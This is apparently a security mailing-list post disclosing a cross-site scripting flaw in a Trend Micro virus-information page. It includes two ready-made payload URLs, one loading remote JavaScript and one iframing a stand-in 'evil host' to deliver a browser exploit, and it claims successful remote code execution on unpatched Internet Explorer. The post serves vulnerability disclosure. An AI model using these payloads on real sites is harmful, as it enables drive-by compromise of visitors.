From: se_cur_ity at hotmail.com (morning_wood)
Subject: Selfmade worms in the wild ;)

well... lets see, we could make it an untrusted link by

"
http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
VName=WORM_MSBLAST.<script%20language="JavaScript"%20src="http://www.astalavista
.com/backend/news.js"%20type="text/javascript"></script> "

and include some remote javascript of our choice, or the latest IE ADODB explot.
the obvious choice for that would be the classic..

http://de.trendmicro-europe.com/enterprise/security_info/ve_detail.php?id=55756&
VName=WORM_MSBLAST.<iframe
src="http://some-evil-host/script/orhtml/etc/bla/"></iframe>

for everones info, the above was tested with the ADODB exploit to execute
remote code... sucessfully i might add. ( unpatched IE )

this goes to show that XSS is still very much a security concern, especially
coupled together with the lastest browser exploit to become a very dangerous
vector of attack, especially by way of a previously "trusted" URL.

this is not looking real good for trend.

good job Mo 8-)

morning_wood
http://exploitlabs.com
http://e2-labs.com